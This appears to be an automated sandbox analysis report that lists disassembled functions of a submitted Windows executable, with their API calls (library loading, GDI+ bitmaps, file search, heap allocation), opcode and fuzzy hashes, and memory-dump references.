Opcode ID: 8e5a1159b93ee6583e736e7d3a7e9b2985ef7142f9d3b5210a58bddc38d4bff6
Instruction ID: 3f7af4a7594b68f9a0cc47c354924d630004372ecd4bdfa210694e943d005ff8
Opcode Fuzzy Hash: 8e5a1159b93ee6583e736e7d3a7e9b2985ef7142f9d3b5210a58bddc38d4bff6
Instruction Fuzzy Hash: 83E092B64002486ADF13BB65DC0AFDE3B6C5B0A789F048851B244DE0A2EA78EA108761

Function 0037081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
Instruction ID: 686b63710b6f57fac7cefc771747b71d8dc7b6aae18b1ededbc5334c64126bd1
Opcode Fuzzy Hash: c7d168612bfed8e71536ad8091bfe59124959445d3ca07a239b7389a3e81a596
Instruction Fuzzy Hash: F1E048B64001187BDB12AB94DC09FDB77ACEF0D3D1F044066B649D6104D674DA84CBB0

Function 0037A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0037A3E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
Instruction ID: a6c84e2803e519dc82ee7bb83ed93890e2fc68e85bf49e1cb82ec5551a2e9f50
Opcode Fuzzy Hash: bd0e35063bb2a736f73462d64e868febf5d03cdeecf78452ed734b10205078f8
Instruction Fuzzy Hash: A8E01275504218EFDB21DF95C541B9DBBF8EF08364F10C05AE89A97201E378AE04DB91

Function 00382B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00382BB5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
Instruction ID: 5c5042bea5b9c8a7e846932b408a099aa63517fe796fb6499062721784d0556b
Opcode Fuzzy Hash: ac8e0d07045ccb45e858a397e7496c85273d71a94bda3a8985d0ffcc6b6427bf
Instruction Fuzzy Hash: 7DD02235156300188C1B7EB028039CB3789AD41F70BB146CBF821CD9C1EE218480A312

Function 003612F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00361306
ShowWindow.USER32(00000000), ref: 0036130D

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
Instruction ID: 642534c231ee3f0fab6cfc6a81c90395f597a8a9220eb5780168e8c42d73efbe
Opcode Fuzzy Hash: 18a2b8b2c92308372309e699275f283974084e686cae41f9e679ea77ac319547
Instruction Fuzzy Hash: E6C0127209C200BECB022BB4DC09C2BBBBCEBA5312F08C908B0A5C0060C238C110DB11

Function 00361A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00361A09

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
Instruction ID: df4eeaec943d2c50888295dd44a8a6af745ebc6465786adfe31da15cd7fcb09f
Opcode Fuzzy Hash: 1dc9ea1d7ed27714ae86ad3ebf542d76b36c0d2b2e79f978ac3c56833697bf98
Instruction Fuzzy Hash: AAC1BF70A002549FEF16CF68C488BBD7BA5AF05310F0D81BAEC469F39ADB719944CB61

Function 00363BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00363BBF

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0c7bf5b85da8bf7c8a02b31435b85289f7037c120b956df56db12659230c0d5a
Instruction ID: 852ee0792818c39739f6b608c5cd88da2ab3cf2109ddbce3a56f3cd1cd73d1f1
Opcode Fuzzy Hash: 0c7bf5b85da8bf7c8a02b31435b85289f7037c120b956df56db12659230c0d5a
Instruction Fuzzy Hash: 5F71D271500F449EDB37DB70C8519E7B7E9AF14301F41892EF2AB8B246DA326A84DF21

Function 00368284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00368289

Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1

Part of subcall function 0036A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
Instruction ID: f44fe1f63c69049e6983b60d91df743f6d167ef8fb38bcc620dca63c61033cd8
Opcode Fuzzy Hash: f60a674df379ed605b402744228b9177c99033c6f27347d82b2844de0f3d94be
Instruction Fuzzy Hash: 8D41F9759046589ADB32DB60CC55BEAB3B8AF04304F0485EBE08A9B187EF755FC4CB10

Function 003613E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003613E1

Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C

Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45

Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 09e94e31d47edddfc2728659294fa482bf17b46703084017c262f6c5b8173c25
Instruction ID: 3acfd6a2745849b09fef22d5d01869db45419aff3e366f8a58279248eae3f2db
Opcode Fuzzy Hash: 09e94e31d47edddfc2728659294fa482bf17b46703084017c262f6c5b8173c25
Instruction Fuzzy Hash: 794148B0905B409EE725CF398885AE6FBE5BF19300F54892ED5EF87282CB316654CB10

Function 003613DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003613E1

Part of subcall function 00365E37: __EH_prolog.LIBCMT ref: 00365E3C

Part of subcall function 0036CE40: __EH_prolog.LIBCMT ref: 0036CE45

Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 93711f228ce68a9db6c94de85b7376c7ffd68cb08a23b9899a5374813bfc303e
Instruction ID: b902abae1458b831d1f99f5a919e3fedcf95c50d946535c222eb6fd1b12b20e8
Opcode Fuzzy Hash: 93711f228ce68a9db6c94de85b7376c7ffd68cb08a23b9899a5374813bfc303e
Instruction Fuzzy Hash: 384167B0905B409EE725CF398885AE6FBE5BF19300F54892ED5FF87282CB326654CB10

Function 0037B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0037B098

Part of subcall function 003613DC: __EH_prolog.LIBCMT ref: 003613E1

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 259e3c23b6d9723540861f37ffb233ba49b7135177bc8b29b17fbbd1e34ad50a
Instruction ID: 62f1c4d7fb7931f6a0e5ef5785234b0ae3768f064c157b6f9b0bc25664ef7933
Opcode Fuzzy Hash: 259e3c23b6d9723540861f37ffb233ba49b7135177bc8b29b17fbbd1e34ad50a
Instruction Fuzzy Hash: F6318F75C04249DFCF26DF64C851AEEBBB4AF09304F54849EE409BB242DB39AE04CB61

Function 0038AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0038ACF8

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
Instruction ID: 068b0710dbe4751864673055225037762e607bc6dcac7a6dd2e94d1522d9cc6c
Opcode Fuzzy Hash: fd41563d04ced54748e9d8539b38fd257ef8926d7a4ffaeb9c15b698923cd087
Instruction Fuzzy Hash: CB110A33600B255FBB23EE28DC5095A73ADAB84720B1741A2FD15EB654D731EC0187D2

Function 00369215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0036921A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
Instruction ID: 29b4cb72f5695f91d94a7ef1c25683564af1a02222b3be54a1f39fd7af1b1a4c
Opcode Fuzzy Hash: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
Instruction Fuzzy Hash: 07016537D00528ABCF23ABA8CD91ADEB735AF89750F05C516E816BF256DA348D04C6A0

Function 00383C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00383C3F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
Instruction ID: e2577761f3cc48dd79a4c6a910ad1bb55afc80913deeecc9eb0e40b8379de56f
Opcode Fuzzy Hash: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
Instruction Fuzzy Hash: BDF08C322003169F8F13AEA8EC0099A77A9BF01F207104165FA06E6290DB31EA20C790

Function 00388E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
Instruction ID: cd6b4acd31763c7ea857ba89a8a5af2a60ae2aaa5d952c7de696a99f0ea06c30
Opcode Fuzzy Hash: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
Instruction Fuzzy Hash: F9E0ED3124672556EA7337719C09BAB768C9F813A0FA601E1BC089A491CF60ED0083E0

Function 00365ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00365AC2

Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
Instruction ID: 57686d49781795d4acdf08ef2f55a61fa712c4e158372675656baec87a30fd47
Opcode Fuzzy Hash: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
Instruction Fuzzy Hash: E801A430410790DAD72AE7B8C0517DDFBE4DF59304F50C48DA45A57283CBB81B08D7A2

Function 0036A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
Part of subcall function 0036A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
Instruction ID: 96d459b21b0f48c66d31e0d159c861ba29f18859239c04a427e9dae86f86f089
Opcode Fuzzy Hash: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
Instruction Fuzzy Hash: DEF05431008B90AACA2367B489047C7BB945F17321F04CA4DF1FA6619AC26550989F23

Function 00370E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00370E3D

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 649d1f7145e353e67988b700c6165bad83ba1a1bc1ca5d9ea8ce7a4209b41989
Instruction ID: 7d4a6f3cfffe9baf89a15e1b53113ef8aaccb58b1d3b3344e5429f1179e87102
Opcode Fuzzy Hash: 649d1f7145e353e67988b700c6165bad83ba1a1bc1ca5d9ea8ce7a4209b41989
Instruction Fuzzy Hash: 95D0121560145456DA37732C68567FE350A8FC7351F0D8066B14D6F686CA5D4886A261

Function 0037A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0037A62C

